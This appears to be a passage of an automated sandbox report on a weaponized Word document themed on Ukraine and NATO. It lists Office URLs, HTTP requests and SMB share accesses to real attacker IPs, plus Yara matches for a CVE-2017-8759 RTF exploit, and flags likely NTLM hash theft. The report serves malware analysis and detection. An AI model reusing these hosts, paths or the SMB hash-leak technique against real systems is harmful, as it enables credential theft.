Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://onedrive.live.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://otelrules.azureedge.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://outlook.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://outlook.office.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://outlook.office365.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://outlook.office365.com/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://pushchannel.1drv.ms
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://res.cdn.office.net/polymer/models
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://settings.outlook.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://staging.cortana.ai
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://substrate.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://tasks.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://wus2.contentsync.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: 3D1FB6CF-CA85-4987-88F9-38A65DB2B247.0.drString found in binary or memory: https://www.yammer.com
Source: global trafficHTTP traffic detected: GET /MSHTML_C7/start.xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.50.94.156Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /MSHTML_C7/RFile.asp HTTP/1.1Accept: */*Referer: http://74.50.94.156/MSHTML_C7/start.xmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.50.94.156Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /MSHTML_C7/zip_k.asp?d=84.17.52.5_4f657_ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.50.94.156Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /MSHTML_C7/zip_k2.asp?d=84.17.52.5_4f657_ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.50.94.156Connection: Keep-AliveCookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP
Source: global trafficHTTP traffic detected: GET /MSHTML_C7/zip_k3.asp?d=84.17.52.5_4f657_ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 74.50.94.156Connection: Keep-AliveCookie: ASPSESSIONIDCSTDATTC=AADBNNGBMMLHHHBHDOHGHCFP

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: afchunk.rtf, type: SAMPLEMatched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen
Source: afchunk.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.
Source: ~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.docReversingLabs: Detection: 29%
Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.docVirustotal: Detection: 49%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Overview_of_UWCs_UkraineInNATO_campaign.docx.doc
Source: BB84B4FE.url.0.drOLE indicator, Word Document stream: true
Source: file001.url.0.drOLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\BibliographyJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{ECAE2491-9D93-48FA-9079-8B02E3BA5F98} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal72.spyw.evad.winDOC@3/41@0/2
Source: ~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.drOLE document summary: edited time not present or 0
Source: BB84B4FE.url.0.drOLE document summary: title field not present or empty
Source: BB84B4FE.url.0.drOLE document summary: edited time not present or 0
Source: file001.url.0.drOLE document summary: title field not present or empty
Source: file001.url.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: ~WRF{23F61671-1248-4D9F-BE58-51806C7F80DF}.tmp.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior

Stealing of Sensitive Information

barindex
Document Viewer accesses SMB path (likely to steal NTLM hashes or to download payload)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\PIPE\srvsvcJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\SHARE1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7\file001.urlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\PIPE\wkssvcJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\PIPE\srvsvcJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: \\104.234.239.26\share1\MSHTML_C7Jump to behavior
